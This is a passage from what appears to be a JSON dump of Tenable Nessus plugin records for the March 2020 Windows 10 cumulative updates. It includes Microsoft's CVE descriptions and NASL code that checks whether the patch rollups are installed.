An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0690)\n\n - An elevation of privilege vulnerability exists when the\n Windows AppX Deployment Server improperly handles file\n operations. (CVE-2020-0776)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-0832, CVE-2020-0833)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-0768, CVE-2020-0830)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when MSI packages process symbolic\n links. An attacker who successfully exploited this\n vulnerability could bypass access restrictions to add or\n remove files. (CVE-2020-0779)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n improperly handles symbolic links. An attacker who\n successfully exploited this vulnerability could\n overwrite a targeted file leading to an elevated status.\n (CVE-2020-0787)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. 
The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-0847)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges. An attacker with unprivileged access to a\n vulnerable system could exploit this vulnerability. The\n security update addresses the vulnerability by ensuring\n the Diagnostics Hub Standard Collector Service properly\n handles file operations. (CVE-2020-0793)\n\n - An information disclosure vulnerability exists when\n Windows Error Reporting improperly handles file\n operations. (CVE-2020-0775)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-0801,\n CVE-2020-0807, CVE-2020-0809, CVE-2020-0869)\n\n - An information disclosure vulnerability exists in\n Windows when the Windows Imaging Component fails to\n properly handle objects in memory. 
An attacker who\n successfully exploited this vulnerability could obtain\n information to further compromise the user's system.\n There are multiple ways an attacker could exploit this\n vulnerability: (CVE-2020-0853)\n\n - An elevation of privilege vulnerability exists when the\n Windows Language Pack Installer improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Language Pack Installer\n handles file operations. (CVE-2020-0822)\n\n - An elevation of privilege vulnerability exists when the\n Windows ActiveX Installer Service improperly handles\n memory. (CVE-2020-0770, CVE-2020-0773, CVE-2020-0860)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting improperly handles memory.\n (CVE-2020-0772)\n\n - A remote code execution vulnerability exists in the way \n that the Chakra scripting engine handles objects in \n memory in Microsoft Edge (HTML-based). The vulnerability\n could corrupt memory in such a way that an attacker could \n execute arbitrary code in the context of the current user. \n An attacker who successfully exploited the vulnerability \n could gain the same user rights as the current user. If \n the current user is logged on with administrative user \n rights, an attacker who successfully exploited the \n vulnerability could take control of an affected system. \n An attacker could then install programs; view, change, \n or delete data; or create new accounts with full user \n rights. 
(CVE-2020-0811, CVE-2020-0812)\n\n - An information disclosure vulnerability exists when \n Chakra improperly discloses the contents of its memory, \n which could provide an attacker with information to \n further compromise the user\u2019s computer or data. \n (CVE-2020-0813)\n\n - A remote code execution vulnerability exists when \n Microsoft Edge improperly accesses objects in memory. \n The vulnerability could corrupt memory in such a way \n that enables an attacker to execute arbitrary code in \n the context of the current user. An attacker who \n successfully exploited the vulnerability could gain \n the same user rights as the current user. If the current \n user is logged on with administrative user rights, an \n attacker could take control of an affected system. An \n attacker could then install programs; view, change, or \n delete data; or create new accounts with full user rights.\n (CVE-2020-0816)\n\n - A remote code execution vulnerability exists in the way \n that the ChakraCore scripting engine handles objects in \n memory. The vulnerability could corrupt memory in such a \n way that an attacker could execute arbitrary code in the \n context of the current user. An attacker who successfully \n exploited the vulnerability could gain the same user \n rights as the current user. If the current user is logged \n on with administrative user rights, an attacker who \n successfully exploited the vulnerability could take \n control of an affected system. An attacker could then \n install programs; view, change, or delete data; or create \n new accounts with full user rights. 
(CVE-2020-08323,\n CVE-2020-0825, CVE-2020-0826, CVE-2020-0827, CVE-2020-0828, \n CVE-2020-0829,CVE-2020-0831, CVE-2020-0848)\");\n # https://support.microsoft.com/en-us/help/4538461/windows-10-update-kb4538461\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?87f654b6\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4538461.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0690\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Background Intelligent Transfer Service Arbitrary File Move Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/03/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/03/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/03/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by 
Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-03\";\nkbs = make_list('4538461');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"17763\",\n rollup_date:\"03_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4538461])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T15:29:51", "description": "The remote Windows host is missing security update 4540689.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the Windows Device Setup Manager improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. 
The update addresses the vulnerability by correcting the way the Windows Device Setup Manager handles file operations. (CVE-2020-0819)\n\n - An elevation of privilege vulnerability exists when the Windows Work Folder Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Work Folder Service handles file operations. (CVE-2020-0777, CVE-2020-0797, CVE-2020-0800, CVE-2020-0864, CVE-2020-0865, CVE-2020-0866, CVE-2020-0897)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0824)\n\n - An elevation of privilege vulnerability exists in Windows Installer because of the way Windows Installer handles certain filesystem operations. (CVE-2020-0814, CVE-2020-0842, CVE-2020-0843)\n\n - An information vulnerability exists when Windows Modules Installer Service improperly discloses file information.\n Successful exploitation of the vulnerability could allow the attacker to read any file on the file system.\n (CVE-2020-0859)\n\n - An elevation of privilege vulnerability exists when the Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-0791)\n\n - An information disclosure vulnerability exists when Windows Network Connections Service fails to properly handle objects in memory. 
An attacker who successfully exploited the vulnerability could potentially disclose memory contents of an elevated process. (CVE-2020-0871)\n\n - An elevation of privilege vulnerability exists when the "Public Account Pictures" folder improperly handles junctions. (CVE-2020-0858)\n\n - A tampering vulnerability exists when Microsoft IIS Server improperly handles malformed request headers. An attacker who successfully exploited the vulnerability could cause a vulnerable server to improperly process HTTP headers and tamper with the responses returned to clients. (CVE-2020-0645)\n\n - An elevation of privilege vulnerability exists in the way the Provisioning Runtime validates certain file operations. An attacker who successfully exploited the vulnerability could gain elevated privileges on a victim system. (CVE-2020-0808)\n\n - An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0788, CVE-2020-0877, CVE-2020-0887)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network Connections Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-0778, CVE-2020-0802, CVE-2020-0803, CVE-2020-0804, CVE-2020-0845)\n\n - An elevation of privilege vulnerability exists in the Windows Installer when the Windows Installer fails to properly sanitize input leading to an insecure library loading behavior. A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. 
The security update addresses the vulnerability by correcting the input sanitization error to preclude unintended elevation. (CVE-2020-0798)\n\n - An elevation of privilege vulnerability exists in Microsoft Windows when the Windows kernel fails to properly handle parsing of certain symbolic links. An attacker who successfully exploited this vulnerability could potentially access privileged registry keys and thereby elevate permissions. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0799)\n\n - An elevation of privilege vulnerability exists when Connected User Experiences and Telemetry Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The security update addresses the vulnerability by correcting how the Connected User Experiences and Telemetry Service handles file operations. (CVE-2020-0844)\n\n - An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector or the Visual Studio Standard Collector allows file creation in arbitrary locations. (CVE-2020-0810)\n\n - A remote code execution vulnerability exists in Microsoft Windows that could allow remote code execution if a .LNK file is processed. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. (CVE-2020-0684)\n\n - An elevation of privilege vulnerability exists when Windows improperly handles hard links. 
An attacker who successfully exploited this vulnerability could overwrite a targeted file leading to an elevated status.\n (CVE-2020-0840, CVE-2020-0841, CVE-2020-0849, CVE-2020-0896)\n\n - An elevation of privilege vulnerability exists when the Windows CSC Service improperly handles memory.\n (CVE-2020-0769, CVE-2020-0771)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Search Indexer handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-0857)\n\n - An elevation of privilege vulnerability exists in Windows Error Reporting (WER) when WER handles and executes files. The vulnerability could allow elevation of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability could gain greater access to sensitive information and system functionality. (CVE-2020-0806)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-0774, CVE-2020-0880, CVE-2020-0882)\n\n - A remote code execution vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in the memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. 
(CVE-2020-0881, CVE-2020-0883)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise a users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document or by convincing a user to visit an untrusted webpage.\n The update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory.\n (CVE-2020-0885)\n\n - An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. An attacker who had already gained execution on the victim system could exploit this vulnerability by running a specially crafted application. The update addresses the vulnerability by correcting how Media Foundation handles objects in memory. (CVE-2020-0820)\n\n - An elevation of privilege vulnerability exists when the Windows Update Orchestrator Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Update Orchestrator Service handles file operations. (CVE-2020-0867, CVE-2020-0868)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network List Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-0780)\n\n - An elevation of privilege vulnerability exists when Windows improperly handles calls to Advanced Local Procedure Call (ALPC). 
An attacker who successfully exploited this vulnerability could run arbitrary code in the security context of the local system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0834)\n\n - An elevation of privilege vulnerability exists when the Windows User Profile Service (ProfSvc) improperly handles symlinks. An attacker who successfully exploited this vulnerability could delete files and folders in an elevated context. (CVE-2020-0785)\n\n - An elevation of privilege vulnerability exists when Windows Defender Security Center handles certain objects in memory. (CVE-2020-0762, CVE-2020-0763)\n\n - An information disclosure vulnerability exists when the Windows Network Driver Interface Specification (NDIS) improperly handles memory. (CVE-2020-0861)\n\n - An elevation of privilege vulnerability exists when DirectX improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0690)\n\n - An elevation of privilege vulnerability exists when the Windows AppX Deployment Server improperly handles file operations. (CVE-2020-0776)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-0832, CVE-2020-0833)\n\n - A remote code execution vulnerability exists in the way the scripting engine handles objects in memory in Microsoft browsers. 
The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-0768, CVE-2020-0830)\n\n - An elevation of privilege vulnerability exists in the Windows Installer when MSI packages process symbolic links. An attacker who successfully exploited this vulnerability could bypass access restrictions to add or remove files. (CVE-2020-0779)\n\n - An elevation of privilege vulnerability exists when the Windows Background Intelligent Transfer Service (BITS) improperly handles symbolic links. An attacker who successfully exploited this vulnerability could overwrite a targeted file leading to an elevated status.\n (CVE-2020-0787)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0847)\n\n - An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector Service improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges. An attacker with unprivileged access to a vulnerable system could exploit this vulnerability. The security update addresses the vulnerability by ensuring the Diagnostics Hub Standard Collector Service properly handles file operations. (CVE-2020-0793)\n\n - An information disclosure vulnerability exists when Windows Error Reporting improperly handles file operations. (CVE-2020-0775)\n\n - An elevation of privilege vulnerability exists when the Windows Universal Plug and Play (UPnP) service improperly handles objects in memory. 
An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0781, CVE-2020-0783)\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-0801, CVE-2020-0807, CVE-2020-0809, CVE-2020-0869)\n\n - An information disclosure vulnerability exists in Windows when the Windows Imaging Component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user's system.\n There are multiple ways an attacker could exploit this vulnerability: (CVE-2020-0853)\n\n - An elevation of privilege vulnerability exists when the Windows Language Pack Installer improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Language Pack Installer handles file operations. (CVE-2020-0822)\n\n - An elevation of privilege vulnerability exists when the Windows ActiveX Installer Service improperly handles memory. 
(CVE-2020-0770, CVE-2020-0773, CVE-2020-0860)\n\n - An elevation of privilege vulnerability exists when Windows Error Reporting improperly handles memory.\n (CVE-2020-0772)\n\n - A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge (HTML-based). The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0811)\n\n - An information disclosure vulnerability exists when Chakra improperly discloses the contents of its memory, which could provide an attacker with information to further compromise the user\u2019s computer or data. (CVE-2020-0813)\n\n - A remote code execution vulnerability exists when Microsoft Edge improperly accesses objects in memory. The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0816) \n - A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. 
An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-08323, CVE-2020-0826, CVE-2020-0827, CVE-2020-0828, CVE-2020-0829, CVE-2020-0831, CVE-2020-0848)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-03-10T00:00:00", "type": "nessus", "title": "KB4540689: Windows 10 Version 1803 March 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0645", "CVE-2020-0684", "CVE-2020-0690", "CVE-2020-0762", "CVE-2020-0763", "CVE-2020-0768", "CVE-2020-0769", "CVE-2020-0770", "CVE-2020-0771", "CVE-2020-0772", "CVE-2020-0773", "CVE-2020-0774", "CVE-2020-0775", "CVE-2020-0776", "CVE-2020-0777", "CVE-2020-0778", "CVE-2020-0779", "CVE-2020-0780", "CVE-2020-0781", "CVE-2020-0783", "CVE-2020-0785", "CVE-2020-0787", "CVE-2020-0788", "CVE-2020-0791", "CVE-2020-0793", "CVE-2020-0797", "CVE-2020-0798", "CVE-2020-0799", "CVE-2020-0800", "CVE-2020-0801", "CVE-2020-0802", "CVE-2020-0803", "CVE-2020-0804", "CVE-2020-0806", "CVE-2020-0807", "CVE-2020-0808", "CVE-2020-0809", "CVE-2020-0810", "CVE-2020-0811", "CVE-2020-0813", "CVE-2020-0814", "CVE-2020-0816", "CVE-2020-0819", "CVE-2020-0820", "CVE-2020-0822", "CVE-2020-0823", "CVE-2020-0824", "CVE-2020-0826", "CVE-2020-0827", "CVE-2020-0828", "CVE-2020-0829", "CVE-2020-0830", "CVE-2020-0831", "CVE-2020-0832", "CVE-2020-08323", "CVE-2020-0833", "CVE-2020-0834", "CVE-2020-0840", "CVE-2020-0841", "CVE-2020-0842", "CVE-2020-0843", "CVE-2020-0844", "CVE-2020-0845", "CVE-2020-0847", "CVE-2020-0848", "CVE-2020-0849", "CVE-2020-0853", "CVE-2020-0857", "CVE-2020-0858", "CVE-2020-0859", "CVE-2020-0860", "CVE-2020-0861", 
"CVE-2020-0864", "CVE-2020-0865", "CVE-2020-0866", "CVE-2020-0867", "CVE-2020-0868", "CVE-2020-0869", "CVE-2020-0871", "CVE-2020-0877", "CVE-2020-0880", "CVE-2020-0881", "CVE-2020-0882", "CVE-2020-0883", "CVE-2020-0885", "CVE-2020-0887", "CVE-2020-0896", "CVE-2020-0897"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS20_MAR_4540689.NASL", "href": "https://www.tenable.com/plugins/nessus/134372", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(134372);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2020-0645\",\n \"CVE-2020-0684\",\n \"CVE-2020-0690\",\n \"CVE-2020-0762\",\n \"CVE-2020-0763\",\n \"CVE-2020-0768\",\n \"CVE-2020-0769\",\n \"CVE-2020-0770\",\n \"CVE-2020-0771\",\n \"CVE-2020-0772\",\n \"CVE-2020-0773\",\n \"CVE-2020-0774\",\n \"CVE-2020-0775\",\n \"CVE-2020-0776\",\n \"CVE-2020-0777\",\n \"CVE-2020-0778\",\n \"CVE-2020-0779\",\n \"CVE-2020-0780\",\n \"CVE-2020-0781\",\n \"CVE-2020-0783\",\n \"CVE-2020-0785\",\n \"CVE-2020-0787\",\n \"CVE-2020-0788\",\n \"CVE-2020-0791\",\n \"CVE-2020-0793\",\n \"CVE-2020-0797\",\n \"CVE-2020-0798\",\n \"CVE-2020-0799\",\n \"CVE-2020-0800\",\n \"CVE-2020-0801\",\n \"CVE-2020-0802\",\n \"CVE-2020-0803\",\n \"CVE-2020-0804\",\n \"CVE-2020-0806\",\n \"CVE-2020-0807\",\n \"CVE-2020-0808\",\n \"CVE-2020-0809\",\n \"CVE-2020-0810\",\n \"CVE-2020-0811\",\n \"CVE-2020-0813\",\n \"CVE-2020-0814\",\n \"CVE-2020-0816\",\n \"CVE-2020-0819\",\n \"CVE-2020-0820\",\n \"CVE-2020-0822\",\n \"CVE-2020-0823\",\n \"CVE-2020-0824\",\n \"CVE-2020-0826\",\n \"CVE-2020-0827\",\n \"CVE-2020-0828\",\n \"CVE-2020-0829\",\n 
\"CVE-2020-0830\",\n \"CVE-2020-0831\",\n \"CVE-2020-0832\",\n \"CVE-2020-0833\",\n \"CVE-2020-0834\",\n \"CVE-2020-0840\",\n \"CVE-2020-0841\",\n \"CVE-2020-0842\",\n \"CVE-2020-0843\",\n \"CVE-2020-0844\",\n \"CVE-2020-0845\",\n \"CVE-2020-0847\",\n \"CVE-2020-0848\",\n \"CVE-2020-0849\",\n \"CVE-2020-0853\",\n \"CVE-2020-0857\",\n \"CVE-2020-0858\",\n \"CVE-2020-0859\",\n \"CVE-2020-0860\",\n \"CVE-2020-0861\",\n \"CVE-2020-0864\",\n \"CVE-2020-0865\",\n \"CVE-2020-0866\",\n \"CVE-2020-0867\",\n \"CVE-2020-0868\",\n \"CVE-2020-0869\",\n \"CVE-2020-0871\",\n \"CVE-2020-0877\",\n \"CVE-2020-0880\",\n \"CVE-2020-0881\",\n \"CVE-2020-0882\",\n \"CVE-2020-0883\",\n \"CVE-2020-0885\",\n \"CVE-2020-0887\",\n \"CVE-2020-0896\",\n \"CVE-2020-0897\"\n );\n script_xref(name:\"MSKB\", value:\"4540689\");\n script_xref(name:\"MSFT\", value:\"MS20-4540689\");\n script_xref(name:\"IAVA\", value:\"2020-A-0214-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"KB4540689: Windows 10 Version 1803 March 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4540689.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the\n Windows Device Setup Manager improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Device Setup Manager\n handles file operations. 
(CVE-2020-0819)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folder Service improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Work Folder Service\n handles file operations. (CVE-2020-0777, CVE-2020-0797,\n CVE-2020-0800, CVE-2020-0864, CVE-2020-0865,\n CVE-2020-0866, CVE-2020-0897)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0824)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-0814,\n CVE-2020-0842, CVE-2020-0843)\n\n - An information vulnerability exists when Windows Modules\n Installer Service improperly discloses file information.\n Successful exploitation of the vulnerability could allow\n the attacker to read any file on the file system.\n (CVE-2020-0859)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-0791)\n\n - An information disclosure vulnerability exists when\n Windows Network Connections Service fails to properly\n handle objects in memory. An attacker who successfully\n exploited the vulnerability could potentially disclose\n memory contents of an elevated process. 
(CVE-2020-0871)\n\n - An elevation of privilege vulnerability exists when the\n "Public Account Pictures" folder improperly\n handles junctions. (CVE-2020-0858)\n\n - A tampering vulnerability exists when Microsoft IIS\n Server improperly handles malformed request headers. An\n attacker who successfully exploited the vulnerability\n could cause a vulnerable server to improperly process\n HTTP headers and tamper with the responses returned to\n clients. (CVE-2020-0645)\n\n - An elevation of privilege vulnerability exists in the\n way the Provisioning Runtime validates certain file\n operations. An attacker who successfully exploited the\n vulnerability could gain elevated privileges on a victim\n system. (CVE-2020-0808)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0788, CVE-2020-0877,\n CVE-2020-0887)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-0778, CVE-2020-0802,\n CVE-2020-0803, CVE-2020-0804, CVE-2020-0845)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. 
